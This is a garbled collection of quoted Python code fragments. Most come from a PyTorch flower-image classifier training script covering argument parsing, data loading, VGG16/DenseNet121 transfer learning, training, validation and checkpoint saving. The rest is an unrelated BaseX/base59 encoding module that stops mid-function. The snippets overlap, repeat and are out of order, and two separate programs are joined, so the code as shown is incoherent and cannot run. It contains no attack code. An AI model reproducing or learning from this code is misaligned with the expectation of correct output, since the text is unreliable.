model ''' correct = 0 total = 0 with torch.no_grad(): model.eval() for", "based on the parameter. Also handles most edge-cases. Returns the device variable to", "Params') parser.add_argument('--architecture', type=str, help='Architecture and model from torchvision.models as strings: vgg16 and densenet121", "labels) loss.backward() optimizer.step() running_loss += loss.item() if steps % print_every == 0: model.eval()", "Imports import pandas as pd import numpy as np import torch from torch", "Network. Default is 1024.') parser.add_argument('--dropout', type=float, help='Dropout value for our Dropout layers. Default", "Default is Y.') args = parser.parse_args() return(args) def load(data_dir='./flowers'): ''' Loads data for", "Returns all six datasets and loaders, in the same order. ''' train_dir =", "gpu, dropout, hidden, learning_rate. Returns a torch model. ''' if architecture: if architecture=='vgg16':", "architecture} file = 'checkpoint.pth' torch.save(checkpoint, file) print('Model saved to {}!'.format(file)) # Main def", "torch.device('cuda' if torch.cuda.is_available() else 'cpu') if device=='cpu': print('CUDA not available; using CPU') else:", "np import torch from torch import nn from torch import optim import torch.nn.functional", "''' valid_loss = 0 valid_acc = 0 for ii, (inputs, labels) in enumerate(valid_loader):", "(inputs, labels) in enumerate(valid_loader): inputs, labels = inputs.to(device), labels.to(device) output = model.forward(inputs) valid_loss", "transforms.Compose([transforms.RandomResizedCrop(224), transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]), 'test': transforms.Compose([transforms.RandomResizedCrop(224), transforms.ToTensor(), transforms.Normalize([0.485, 0.456,", "datasets.ImageFolder(test_dir, transform=data_transforms['test']), 'valid': datasets.ImageFolder(valid_dir, transform=data_transforms['valid']) } dataloaders = { 'train': torch.utils.data.DataLoader(image_datasets['train'], 64, shuffle=True),", "total = 0 with torch.no_grad(): model.eval() for data in test_loader: images, labels =", "and loaders, in the same order. ''' train_dir = data_dir + '/train' valid_dir", "inputs: 1024') hidden = 1024 if learning_rate: learning_rate = learning_rate else: print('No learning_rate", "print('Accuracy: {}'.format(accuracy)) def save(model, train_data, epochs, architecture): ''' Saves the model to the", "transforms from collections import OrderedDict import os import argparse # Functions def arg_parser():", "64, shuffle=True), 'test': torch.utils.data.DataLoader(image_datasets['test'], 32, shuffle=True), 'valid': torch.utils.data.DataLoader(image_datasets['valid'], 32, shuffle=True) } return(dataloaders['train'], dataloaders['test'],", "Python functions. ''' parser = argparse.ArgumentParser(description='ImageClassifier Params') parser.add_argument('--architecture', type=str, help='Architecture and model from", "accuracy = round(100 * correct / total, 2) print('Accuracy: {}'.format(accuracy)) def save(model, train_data,", "torch.max(outputs.data, 1) total += labels.size(0) correct += (predicted == labels).sum().item() accuracy = round(100", "Dropout layers. Default is 0.05.') parser.add_argument('--epochs', type=int, help='Epochs for Neural Network training. Default", "if hidden: hidden = hidden else: print('No number of hidden inputs specified. Fallback", "device variable to be used later. ''' if gpu=='Y': device = torch.device('cuda' if", "= round(100 * correct / total, 2) print('Accuracy: {}'.format(accuracy)) def save(model, train_data, epochs,", "Neural Network. Default is 0.001.') parser.add_argument('--hidden', type=int, help='Hidden Units for our Neural Network.", "given path. ''' model.class_to_idx = train_data.class_to_idx if epochs: epochs = epochs else: epochs", "1024 else: print('Invalid input: Please use \\'vgg16\\' or \\'densenet121\\'') else: print('No architecture given.", "= 0 valid_acc = 0 for ii, (inputs, labels) in enumerate(valid_loader): inputs, labels", "our Neural Network model ''' steps = 0 if epochs: epochs = epochs", "Validation function for our model. Returns validation loss and accuracy. ''' valid_loss =", "and validation. Also loads dataloaders for all three in the same order. Returns", "handles most edge-cases. Returns the device variable to be used later. ''' if", "= 25088 if hidden: hidden = hidden else: print('No number of hidden inputs", "torch.no_grad(): valid_loss, valid_acc = validation(model, valid_loader, criterion, device) training_loss = round(float(running_loss/print_every), 3) valid_loss", "{}' .format(e+1, epochs, training_loss, valid_loss, valid_acc)) running_loss = 0 model.train() print('Model training complete!')", "parser.add_argument('--architecture', type=str, help='Architecture and model from torchvision.models as strings: vgg16 and densenet121 supported.')", "= 'checkpoint.pth' torch.save(checkpoint, file) print('Model saved to {}!'.format(file)) # Main def main(): args", "labels.size(0) correct += (predicted == labels).sum().item() accuracy = round(100 * correct / total,", "nn from torch import optim import torch.nn.functional as F import torch.utils.data from torchvision", "transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]) } image_datasets = { 'train': datasets.ImageFolder(train_dir, transform=data_transforms['train']),", "if epochs: epochs = epochs else: epochs = 1 checkpoint = {'state_dict': model.state_dict(),", "loaders, in the same order. ''' train_dir = data_dir + '/train' valid_dir =", "valid_loader, device, epochs=1, print_every=50): ''' Trains our Neural Network model ''' steps =", "epochs=1, print_every=50): ''' Trains our Neural Network model ''' steps = 0 if", "for data in test_loader: images, labels = data images, labels = images.to(device), labels.to(device)", "to {}!'.format(file)) # Main def main(): args = arg_parser() if args.gpu: gpu=args.gpu else:", "== ps.max(dim=1)[1]) valid_acc += equality.type(torch.FloatTensor).mean() return valid_loss, valid_acc def train(model, criterion, optimizer, train_loader,", "round(float(valid_loss/len(valid_loader)), 3) valid_acc = round(float(valid_acc/len(valid_loader)), 3) print('Epoch: {}/{} :: Training Loss: {} ::", "torch.cuda.is_available() else 'cpu') if device=='cpu': print('CUDA not available; using CPU') else: print('Using GPU')", "No). Default is Y.') args = parser.parse_args() return(args) def load(data_dir='./flowers'): ''' Loads data", "the model to the given path. ''' model.class_to_idx = train_data.class_to_idx if epochs: epochs", "device = set_device(gpu) train_loader, test_loader, valid_loader, train_data, test_data, valid_data = load() model, criterion,", "total += labels.size(0) correct += (predicted == labels).sum().item() accuracy = round(100 * correct", "if device=='cpu': print('CUDA not available; using CPU') else: print('Using GPU') elif gpu=='N': device", "Accuracy: {}' .format(e+1, epochs, training_loss, valid_loss, valid_acc)) running_loss = 0 model.train() print('Model training", "3) valid_acc = round(float(valid_acc/len(valid_loader)), 3) print('Epoch: {}/{} :: Training Loss: {} :: Validation", "'test': transforms.Compose([transforms.RandomResizedCrop(224), transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]) } image_datasets = {", "args.gpu: gpu=args.gpu else: print('No input given. Fallback to default GPU: 1') gpu='Y' device", "test and validation. Also loads dataloaders for all three in the same order.", "inputs.to(device), labels.to(device) output = model.forward(inputs) valid_loss += criterion(output, labels).item() ps = torch.exp(output) equality", "== labels).sum().item() accuracy = round(100 * correct / total, 2) print('Accuracy: {}'.format(accuracy)) def", "the same order. ''' train_dir = data_dir + '/train' valid_dir = data_dir +", "accuracy of model ''' correct = 0 total = 0 with torch.no_grad(): model.eval()", "loss = criterion(outputs, labels) loss.backward() optimizer.step() running_loss += loss.item() if steps % print_every", "('output', nn.LogSoftmax(dim=1)) ])) model.classifier = classifier model.to(device) criterion = nn.NLLLoss() optimizer = optim.Adam(model.classifier.parameters(),", "transforms.Compose([transforms.RandomResizedCrop(224), transforms.RandomVerticalFlip(0.5), transforms.RandomRotation(75), transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]), 'valid': transforms.Compose([transforms.RandomResizedCrop(224), transforms.ToTensor(),", "in architecture, gpu, dropout, hidden, learning_rate. Returns a torch model. ''' if architecture:", "else: print('No learning_rate specified. Fallback to default learning_rate: 0.001') learning_rate = 0.001 if", "model ''' correct = 0 total = 0 with torch.no_grad(): model.eval() for data", "''' Loads data for train, test and validation. Also loads dataloaders for all", "type=str, help='Use GPU (Y for Yes; N for No). Default is Y.') args", "''' Saves the model to the given path. ''' model.class_to_idx = train_data.class_to_idx if", "GPU') return(device) def build(device, architecture='vgg16', dropout=0.05, hidden=1024, learning_rate=0.001): ''' Takens in architecture, gpu,", "from collections import OrderedDict import os import argparse # Functions def arg_parser(): '''", "model. ''' if architecture: if architecture=='vgg16': model = models.vgg16(pretrained=True) model.name = architecture input_", "= hidden else: print('No number of hidden inputs specified. Fallback to default inputs:", "0.05') dropout = 0.05 for parameter in model.parameters(): parameter.requires_grad = False classifier =", "print('Invalid input: Please use \\'vgg16\\' or \\'densenet121\\'') else: print('No architecture given. Fallback to", "predicted = torch.max(outputs.data, 1) total += labels.size(0) correct += (predicted == labels).sum().item() accuracy", "return(dataloaders['train'], dataloaders['test'], dataloaders['valid'], image_datasets['train'], image_datasets['test'], image_datasets['valid']) def set_device(gpu): ''' Sets the device based", "def load(data_dir='./flowers'): ''' Loads data for train, test and validation. Also loads dataloaders", "correct = 0 total = 0 with torch.no_grad(): model.eval() for data in test_loader:", "validation. Also loads dataloaders for all three in the same order. Returns all", "0.406], [0.229, 0.224, 0.225])]) } image_datasets = { 'train': datasets.ImageFolder(train_dir, transform=data_transforms['train']), 'test': datasets.ImageFolder(test_dir,", "epochs: epochs = epochs else: epochs = 1 checkpoint = {'state_dict': model.state_dict(), 'classifier':", "Default is 0.05.') parser.add_argument('--epochs', type=int, help='Epochs for Neural Network training. Default is 1.')", "= 1024 if learning_rate: learning_rate = learning_rate else: print('No learning_rate specified. Fallback to", "= 0.001 if dropout: dropout = dropout else: print('No dropout specified. Fallback to", "train_loader, valid_loader, device, epochs=1, print_every=50): ''' Trains our Neural Network model ''' steps", "train_loader, test_loader, valid_loader, train_data, test_data, valid_data = load() model, criterion, optimizer = build(device,", "hidden=args.hidden, learning_rate=args.learning_rate) model = train(model=model, train_loader=train_loader, valid_loader=valid_loader, device=device, criterion=criterion, optimizer=optimizer, epochs=args.epochs) validate(model=model, test_loader=test_loader,", "0.001.') parser.add_argument('--hidden', type=int, help='Hidden Units for our Neural Network. Default is 1024.') parser.add_argument('--dropout',", "model.eval() for data in test_loader: images, labels = data images, labels = images.to(device),", "ii, (inputs, labels) in enumerate(train_loader): steps += 1 inputs, labels = inputs.to(device), labels.to(device)", "Training Loss: {} :: Validation Loss: {} :: Validation Accuracy: {}' .format(e+1, epochs,", "to the given path. ''' model.class_to_idx = train_data.class_to_idx if epochs: epochs = epochs", ":: Validation Accuracy: {}' .format(e+1, epochs, training_loss, valid_loss, valid_acc)) running_loss = 0 model.train()", "hidden, learning_rate. Returns a torch model. ''' if architecture: if architecture=='vgg16': model =", "gpu=args.gpu else: print('No input given. Fallback to default GPU: 1') gpu='Y' device =", "Default is 0.001.') parser.add_argument('--hidden', type=int, help='Hidden Units for our Neural Network. Default is", "epochs, training_loss, valid_loss, valid_acc)) running_loss = 0 model.train() print('Model training complete!') return(model) def", "with torch.no_grad(): model.eval() for data in test_loader: images, labels = data images, labels", "valid_dir = data_dir + '/valid' test_dir = data_dir + '/test' data_transforms = {'train':", "type=float, help='Dropout value for our Dropout layers. Default is 0.05.') parser.add_argument('--epochs', type=int, help='Epochs", "import torch from torch import nn from torch import optim import torch.nn.functional as", "arg_parser(): ''' Takes in command-line arguments and parses them for usage of our", "if args.gpu: gpu=args.gpu else: print('No input given. Fallback to default GPU: 1') gpu='Y'", "print('No architecture given. Fallback to default architecture: \\'vgg16\\'') model = models.vgg16(pretrained=True) model.name =", "model.zero_grad() # Forward and backward passes outputs = model.forward(inputs) loss = criterion(outputs, labels)", "argparse # Functions def arg_parser(): ''' Takes in command-line arguments and parses them", "else 'cpu') if device=='cpu': print('CUDA not available; using CPU') else: print('Using GPU') elif", "= data images, labels = images.to(device), labels.to(device) outputs = model(images) _, predicted =", "''' Trains our Neural Network model ''' steps = 0 if epochs: epochs", "train_data, test_data, valid_data = load() model, criterion, optimizer = build(device, architecture=args.architecture, dropout=args.dropout, hidden=args.hidden,", "1024 if learning_rate: learning_rate = learning_rate else: print('No learning_rate specified. Fallback to default", "Neural Network model ''' steps = 0 if epochs: epochs = epochs else:", "0.406], [0.229, 0.224, 0.225])]), 'test': transforms.Compose([transforms.RandomResizedCrop(224), transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])])", "Rate for our Neural Network. Default is 0.001.') parser.add_argument('--hidden', type=int, help='Hidden Units for", "architecture='vgg16', dropout=0.05, hidden=1024, learning_rate=0.001): ''' Takens in architecture, gpu, dropout, hidden, learning_rate. Returns", "data for train, test and validation. Also loads dataloaders for all three in", "loss and accuracy. ''' valid_loss = 0 valid_acc = 0 for ii, (inputs,", "set_device(gpu): ''' Sets the device based on the parameter. Also handles most edge-cases.", "test_dir = data_dir + '/test' data_transforms = {'train': transforms.Compose([transforms.RandomResizedCrop(224), transforms.RandomVerticalFlip(0.5), transforms.RandomRotation(75), transforms.ToTensor(), transforms.Normalize([0.485,", "model. Returns validation loss and accuracy. ''' valid_loss = 0 valid_acc = 0", "file) print('Model saved to {}!'.format(file)) # Main def main(): args = arg_parser() if", "epochs, 'architecture': architecture} file = 'checkpoint.pth' torch.save(checkpoint, file) print('Model saved to {}!'.format(file)) #", "2) print('Accuracy: {}'.format(accuracy)) def save(model, train_data, epochs, architecture): ''' Saves the model to", "to default epochs: 1') epochs = 1 print('Training Model for {} epochs'.format(epochs)) for", "\\'densenet121\\'') else: print('No architecture given. Fallback to default architecture: \\'vgg16\\'') model = models.vgg16(pretrained=True)", "device based on the parameter. Also handles most edge-cases. Returns the device variable", "dropout=args.dropout, hidden=args.hidden, learning_rate=args.learning_rate) model = train(model=model, train_loader=train_loader, valid_loader=valid_loader, device=device, criterion=criterion, optimizer=optimizer, epochs=args.epochs) validate(model=model,", "Validation Accuracy: {}' .format(e+1, epochs, training_loss, valid_loss, valid_acc)) running_loss = 0 model.train() print('Model", "inputs.to(device), labels.to(device) model.zero_grad() # Forward and backward passes outputs = model.forward(inputs) loss =", "0 total = 0 with torch.no_grad(): model.eval() for data in test_loader: images, labels", "test_data, valid_data = load() model, criterion, optimizer = build(device, architecture=args.architecture, dropout=args.dropout, hidden=args.hidden, learning_rate=args.learning_rate)", "False classifier = nn.Sequential(OrderedDict([ ('fc1', nn.Linear(input_, hidden)), ('relu', nn.ReLU()), ('dropout1', nn.Dropout(dropout)), ('fc2', nn.Linear(hidden,", "print('Model training complete!') return(model) def validate(model, test_loader, device): ''' Prints validation accuracy of", "'architecture': architecture} file = 'checkpoint.pth' torch.save(checkpoint, file) print('Model saved to {}!'.format(file)) # Main", "image_datasets['train'], image_datasets['test'], image_datasets['valid']) def set_device(gpu): ''' Sets the device based on the parameter.", "dataloaders = { 'train': torch.utils.data.DataLoader(image_datasets['train'], 64, shuffle=True), 'test': torch.utils.data.DataLoader(image_datasets['test'], 32, shuffle=True), 'valid': torch.utils.data.DataLoader(image_datasets['valid'],", "''' model.class_to_idx = train_data.class_to_idx if epochs: epochs = epochs else: epochs = 1", "0.001') learning_rate = 0.001 if dropout: dropout = dropout else: print('No dropout specified.", "test_loader, valid_loader, train_data, test_data, valid_data = load() model, criterion, optimizer = build(device, architecture=args.architecture,", "= 0.05 for parameter in model.parameters(): parameter.requires_grad = False classifier = nn.Sequential(OrderedDict([ ('fc1',", "Network model ''' steps = 0 if epochs: epochs = epochs else: print('No", "hidden)), ('relu', nn.ReLU()), ('dropout1', nn.Dropout(dropout)), ('fc2', nn.Linear(hidden, 102, bias=True)), ('output', nn.LogSoftmax(dim=1)) ])) model.classifier", "specified. Fallback to default inputs: 1024') hidden = 1024 if learning_rate: learning_rate =", "= 0 for ii, (inputs, labels) in enumerate(valid_loader): inputs, labels = inputs.to(device), labels.to(device)", "model(images) _, predicted = torch.max(outputs.data, 1) total += labels.size(0) correct += (predicted ==", "architecture): ''' Saves the model to the given path. ''' model.class_to_idx = train_data.class_to_idx", "= architecture input_ = 1024 else: print('Invalid input: Please use \\'vgg16\\' or \\'densenet121\\'')", "most edge-cases. Returns the device variable to be used later. ''' if gpu=='Y':", "nn.ReLU()), ('dropout1', nn.Dropout(dropout)), ('fc2', nn.Linear(hidden, 102, bias=True)), ('output', nn.LogSoftmax(dim=1)) ])) model.classifier = classifier", "data_dir + '/valid' test_dir = data_dir + '/test' data_transforms = {'train': transforms.Compose([transforms.RandomResizedCrop(224), transforms.RandomVerticalFlip(0.5),", "validation(model, valid_loader, criterion, device) training_loss = round(float(running_loss/print_every), 3) valid_loss = round(float(valid_loss/len(valid_loader)), 3) valid_acc", "'valid': torch.utils.data.DataLoader(image_datasets['valid'], 32, shuffle=True) } return(dataloaders['train'], dataloaders['test'], dataloaders['valid'], image_datasets['train'], image_datasets['test'], image_datasets['valid']) def set_device(gpu):", ":: Validation Loss: {} :: Validation Accuracy: {}' .format(e+1, epochs, training_loss, valid_loss, valid_acc))", "to default GPU: 1') gpu='Y' device = set_device(gpu) train_loader, test_loader, valid_loader, train_data, test_data,", "else 'cpu') if device=='cpu': print('CUDA not available; using CPU') else: print('Using GPU') return(device)", "torch.no_grad(): model.eval() for data in test_loader: images, labels = data images, labels =", "to default inputs: 1024') hidden = 1024 if learning_rate: learning_rate = learning_rate else:", "Loss: {} :: Validation Accuracy: {}' .format(e+1, epochs, training_loss, valid_loss, valid_acc)) running_loss =", "{}/{} :: Training Loss: {} :: Validation Loss: {} :: Validation Accuracy: {}'", "from torchvision import datasets, models, transforms from collections import OrderedDict import os import", "load() model, criterion, optimizer = build(device, architecture=args.architecture, dropout=args.dropout, hidden=args.hidden, learning_rate=args.learning_rate) model = train(model=model,", "criterion=criterion, optimizer=optimizer, epochs=args.epochs) validate(model=model, test_loader=test_loader, device=device) save(model=model, train_data=train_data, epochs=args.epochs, architecture = args.architecture) if", "0.05 for parameter in model.parameters(): parameter.requires_grad = False classifier = nn.Sequential(OrderedDict([ ('fc1', nn.Linear(input_,", "criterion = nn.NLLLoss() optimizer = optim.Adam(model.classifier.parameters(), lr=learning_rate) return(model, criterion, optimizer) def validation(model, valid_loader,", "1024.') parser.add_argument('--dropout', type=float, help='Dropout value for our Dropout layers. Default is 0.05.') parser.add_argument('--epochs',", "{} :: Validation Loss: {} :: Validation Accuracy: {}' .format(e+1, epochs, training_loss, valid_loss,", "Takens in architecture, gpu, dropout, hidden, learning_rate. Returns a torch model. ''' if", "entered.') print('Fallback to default GPU: 1') device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')", "import numpy as np import torch from torch import nn from torch import", "} image_datasets = { 'train': datasets.ImageFolder(train_dir, transform=data_transforms['train']), 'test': datasets.ImageFolder(test_dir, transform=data_transforms['test']), 'valid': datasets.ImageFolder(valid_dir, transform=data_transforms['valid'])", "for ii, (inputs, labels) in enumerate(valid_loader): inputs, labels = inputs.to(device), labels.to(device) output =", "def set_device(gpu): ''' Sets the device based on the parameter. Also handles most", "criterion(outputs, labels) loss.backward() optimizer.step() running_loss += loss.item() if steps % print_every == 0:", "0.224, 0.225])]) } image_datasets = { 'train': datasets.ImageFolder(train_dir, transform=data_transforms['train']), 'test': datasets.ImageFolder(test_dir, transform=data_transforms['test']), 'valid':", "learning_rate. Returns a torch model. ''' if architecture: if architecture=='vgg16': model = models.vgg16(pretrained=True)", "= train_data.class_to_idx if epochs: epochs = epochs else: epochs = 1 checkpoint =", "print_every=50): ''' Trains our Neural Network model ''' steps = 0 if epochs:", "1') gpu='Y' device = set_device(gpu) train_loader, test_loader, valid_loader, train_data, test_data, valid_data = load()", "argparse.ArgumentParser(description='ImageClassifier Params') parser.add_argument('--architecture', type=str, help='Architecture and model from torchvision.models as strings: vgg16 and", "torch import nn from torch import optim import torch.nn.functional as F import torch.utils.data", "for e in range(epochs): running_loss = 0 for ii, (inputs, labels) in enumerate(train_loader):", "F import torch.utils.data from torchvision import datasets, models, transforms from collections import OrderedDict", "'/train' valid_dir = data_dir + '/valid' test_dir = data_dir + '/test' data_transforms =", "architecture=='densenet121': model = models.densenet121(pretrained=True) model.name = architecture input_ = 1024 else: print('Invalid input:", "(predicted == labels).sum().item() accuracy = round(100 * correct / total, 2) print('Accuracy: {}'.format(accuracy))", "''' Takens in architecture, gpu, dropout, hidden, learning_rate. Returns a torch model. '''", "checkpoint = {'state_dict': model.state_dict(), 'classifier': model.classifier, 'class_to_idx': model.class_to_idx, 'epochs': epochs, 'architecture': architecture} file", "return(device) def build(device, architecture='vgg16', dropout=0.05, hidden=1024, learning_rate=0.001): ''' Takens in architecture, gpu, dropout,", "= {'state_dict': model.state_dict(), 'classifier': model.classifier, 'class_to_idx': model.class_to_idx, 'epochs': epochs, 'architecture': architecture} file =", "outputs = model.forward(inputs) loss = criterion(outputs, labels) loss.backward() optimizer.step() running_loss += loss.item() if", "in enumerate(train_loader): steps += 1 inputs, labels = inputs.to(device), labels.to(device) model.zero_grad() # Forward", "= (labels.data == ps.max(dim=1)[1]) valid_acc += equality.type(torch.FloatTensor).mean() return valid_loss, valid_acc def train(model, criterion,", "args = parser.parse_args() return(args) def load(data_dir='./flowers'): ''' Loads data for train, test and", "classifier = nn.Sequential(OrderedDict([ ('fc1', nn.Linear(input_, hidden)), ('relu', nn.ReLU()), ('dropout1', nn.Dropout(dropout)), ('fc2', nn.Linear(hidden, 102,", "for Yes; N for No). Default is Y.') args = parser.parse_args() return(args) def", "variable to be used later. ''' if gpu=='Y': device = torch.device('cuda' if torch.cuda.is_available()", "valid_acc = round(float(valid_acc/len(valid_loader)), 3) print('Epoch: {}/{} :: Training Loss: {} :: Validation Loss:", "enumerate(valid_loader): inputs, labels = inputs.to(device), labels.to(device) output = model.forward(inputs) valid_loss += criterion(output, labels).item()", "import torch.nn.functional as F import torch.utils.data from torchvision import datasets, models, transforms from", "0 for ii, (inputs, labels) in enumerate(valid_loader): inputs, labels = inputs.to(device), labels.to(device) output", "epochs: epochs = epochs else: print('No epochs specified. Fallback to default epochs: 1')", "= model.forward(inputs) loss = criterion(outputs, labels) loss.backward() optimizer.step() running_loss += loss.item() if steps", "train_data.class_to_idx if epochs: epochs = epochs else: epochs = 1 checkpoint = {'state_dict':", "numpy as np import torch from torch import nn from torch import optim", "dropout specified. Fallback to default dropout: 0.05') dropout = 0.05 for parameter in", "loads dataloaders for all three in the same order. Returns all six datasets", "model = models.vgg16(pretrained=True) model.name = architecture input_ = 25088 elif architecture=='densenet121': model =", "print_every == 0: model.eval() with torch.no_grad(): valid_loss, valid_acc = validation(model, valid_loader, criterion, device)", "def validate(model, test_loader, device): ''' Prints validation accuracy of model ''' correct =", "or \\'densenet121\\'') else: print('No architecture given. Fallback to default architecture: \\'vgg16\\'') model =", "using CPU') else: print('Using GPU') elif gpu=='N': device = 'cpu' print('Using CPU') else:", "of hidden inputs specified. Fallback to default inputs: 1024') hidden = 1024 if", "labels.to(device) outputs = model(images) _, predicted = torch.max(outputs.data, 1) total += labels.size(0) correct", "learning_rate=0.001): ''' Takens in architecture, gpu, dropout, hidden, learning_rate. Returns a torch model.", "= 0 if epochs: epochs = epochs else: print('No epochs specified. Fallback to", "for No). Default is Y.') args = parser.parse_args() return(args) def load(data_dir='./flowers'): ''' Loads", "+ '/test' data_transforms = {'train': transforms.Compose([transforms.RandomResizedCrop(224), transforms.RandomVerticalFlip(0.5), transforms.RandomRotation(75), transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229,", "= architecture input_ = 25088 elif architecture=='densenet121': model = models.densenet121(pretrained=True) model.name = architecture" ]
[ "= v.decode('ascii') while True: chk = self.decoder[ord(v[-1:])] v = v[:-1] if chk <", "while True: chk = self.decoder[ord(v[-1:])] v = v[:-1] if chk < 0: continue", "TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.", "in self.translate: o = ord(a) i = self.decoder[o] if i < self.base: x", "reversed(result))) def chksum(self, v): \"\"\"Get checksum character for BaseX encoded string\"\"\" if not", "self.base return decimal, sum_chk % self.base def decode(self, v): \"\"\"Decode a BaseX encoded", "EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,", "the Software without restriction, including without limitation the rights # to use, copy,", "to standard output.\"\"\" import sys import argparse stdout = sys.stdout parser = argparse.ArgumentParser(description=main.__doc__)", "ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN", "argparse.ArgumentParser(description=main.__doc__) parser.add_argument( 'file', metavar='FILE', nargs='?', type=argparse.FileType('r'), default='-') parser.add_argument( '-d', '--decode', action='store_true', help='decode data')", "person obtaining a copy # of this software and associated documentation files (the", ">= self.base: raise ValueError(\"Invalid character\") decimal = decimal * self.base + i sum_chk", "sum_chk = (self.base - (sum_chk % self.base)) % self.base return result + self.alphabet[sum_chk]", "= argparse.ArgumentParser(description=main.__doc__) parser.add_argument( 'file', metavar='FILE', nargs='?', type=argparse.FileType('r'), default='-') parser.add_argument( '-d', '--decode', action='store_true', help='decode", "b59decode, }[(args.decode, args.check)] data = args.file.read().rstrip(b'\\n') try: result = fun(data) except Exception as", "not isinstance(v, bytes): raise TypeError(\"a bytes-like object is required, not '%s'\" % type(v).__name__)", "self.base + i sum_chk += i sumsz += 1 sum_chk += sumsz +", "= 0 sum_chk = 0 sumsz = 0 for char in v: o", "A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR", "SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR #", "result + self.alphabet[sum_chk] def decode_int(self, v): \"\"\"Decode a BaseX encoded string as an", "i < self.base: x = i else: self.decoder[o] = x def encode_int(self, i,", "# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies", "if i < 0: continue if i >= self.base: raise ValueError(\"Invalid character\") decimal", "[self.base] * 256 for i, a in enumerate(self.alphabet): o = ord(a) self.decoder[o] =", "acc: result.append(acc & 0xff) acc >>= 8 return ''.join(map(chr, reversed(result))) def chksum(self, v):", "above copyright notice and this permission notice shall be included in # all", "sum_chk % self.base def encode(self, v): \"\"\"Encode a string using BaseX\"\"\" if not", "default_one=True): \"\"\"Encode an integer using BaseX\"\"\" if not i and default_one: return self.alphabet[0]", "+ sumsz / self.base return decimal, sum_chk % self.base def decode(self, v): \"\"\"Decode", "i: i, idx = divmod(i, self.base) string = self.alphabet[idx] + string sum_chk +=", "\"\"\"BaseX encode or decode FILE, or standard input, to standard output.\"\"\" import sys", "2015-2018 Dubalu LLC. All rights reserved. # # Permission is hereby granted, free", "is hereby granted, free of charge, to any person obtaining a copy #", "Dubalu LLC. All rights reserved. # # Permission is hereby granted, free of", "i sum_chk += i sumsz += 1 sum_chk += sumsz + sumsz /", "persons to whom the Software is # furnished to do so, subject to", "sum_chk % self.base def decode(self, v): \"\"\"Decode a BaseX encoded string\"\"\" if not", "conditions: # # The above copyright notice and this permission notice shall be", "INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A", "sum_chk = self.encode_int(acc, default_one=False) sum_chk = (self.base - (sum_chk % self.base)) % self.base", "# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE", "OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,", "documentation files (the \"Software\"), to deal # in the Software without restriction, including", "p = p << 8 result, sum_chk = self.encode_int(acc, default_one=False) sum_chk = (self.base", "return self.alphabet[sum_chk] b59 = BaseX('zGLUAC2EwdDRrkWBatmscxyYlg6jhP7K53TibenZpMVuvoO9H4XSQq8FfJN', '~l1IO0') b59decode = b59.decode b59encode = b59.encode def", "translate): self.alphabet = alphabet self.translate = translate self.base = len(self.alphabet) self.decoder = [self.base]", "to permit persons to whom the Software is # furnished to do so,", "= fun(data) except Exception as e: sys.exit(e) if not isinstance(result, bytes): result =", "ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT,", "or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED \"AS", "sys.exit(e) if not isinstance(result, bytes): result = result.encode('ascii') stdout.write(result) if __name__ == '__main__':", "parser.add_argument( '-d', '--decode', action='store_true', help='decode data') parser.add_argument( '-c', '--check', action='store_true', help='append a checksum", "notice and this permission notice shall be included in # all copies or", "a BaseX encoded string\"\"\" if not isinstance(v, str): v = v.decode('ascii') while True:", "of charge, to any person obtaining a copy # of this software and", "result.append(acc & 0xff) acc >>= 8 return ''.join(map(chr, reversed(result))) def chksum(self, v): \"\"\"Get", "= self.alphabet[idx] + string sum_chk += idx sumsz = len(string) sum_chk += sumsz", "* self.base + i sum_chk += i sumsz += 1 sum_chk += sumsz", "while acc: result.append(acc & 0xff) acc >>= 8 return ''.join(map(chr, reversed(result))) def chksum(self,", "v.decode('ascii') acc, sum_chk = self.decode_int(v) sum_chk = (self.base - (sum_chk % self.base)) %", "decode FILE, or standard input, to standard output.\"\"\" import sys import argparse stdout", "and this permission notice shall be included in # all copies or substantial", "ValueError(\"Invalid character\") decimal = decimal * self.base + i sum_chk += i sumsz", "+= i sumsz += 1 sum_chk += sumsz + sumsz / self.base return", "self.translate = translate self.base = len(self.alphabet) self.decoder = [self.base] * 256 for i,", "acc, sum_chk = self.decode_int(v) sum_chk += chk if sum_chk % self.base: raise ValueError(\"Invalid", "so, subject to the following conditions: # # The above copyright notice and", "LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION", "= v.decode('ascii') decimal = 0 sum_chk = 0 sumsz = 0 for char", "if not isinstance(result, bytes): result = result.encode('ascii') stdout.write(result) if __name__ == '__main__': main()", "str): v = v.decode('ascii') decimal = 0 sum_chk = 0 sumsz = 0", "USE OR OTHER DEALINGS IN # THE SOFTWARE. # \"\"\" BaseX encoding \"\"\"", "metavar='FILE', nargs='?', type=argparse.FileType('r'), default='-') parser.add_argument( '-d', '--decode', action='store_true', help='decode data') parser.add_argument( '-c', '--check',", "def chksum(self, v): \"\"\"Get checksum character for BaseX encoded string\"\"\" if not isinstance(v,", "for c in map(ord, reversed(v)): acc += p * c p = p", "'-d', '--decode', action='store_true', help='decode data') parser.add_argument( '-c', '--check', action='store_true', help='append a checksum before", "0 while i: i, idx = divmod(i, self.base) string = self.alphabet[idx] + string", "''.join(map(chr, 